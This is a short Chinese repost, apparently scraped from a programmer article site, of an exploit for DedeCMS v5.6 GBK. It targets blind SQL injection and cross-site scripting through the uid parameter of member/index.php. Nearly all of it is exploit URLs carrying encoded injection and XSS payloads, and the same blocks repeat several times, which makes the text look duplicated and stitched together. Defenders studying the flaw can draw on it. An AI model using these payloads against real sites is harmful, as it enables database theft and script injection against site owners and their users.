dedecms v5.6 GBK 注入漏洞利用(member/index.php)
程序员文章站
2022-07-03 10:07:44
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS
... 11-08-19...
exp:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7';
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,xss
exp:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7';
htp://127.0.0.1/member/index.php?uid=%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7wfxssprobe'")/>
htp://127.0.0.1/member/index.php?uid=%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7'">
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7';
会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,xss
exp:
htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7';
htp://127.0.0.1/member/index.php?uid=%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7wfxssprobe'")/>
htp://127.0.0.1/member/index.php?uid=%e6%b6%9b%e5%a3%b0%e4%be%9d%e6%97%a7'">
上一篇: SQL注入中获取数据的一些技巧分析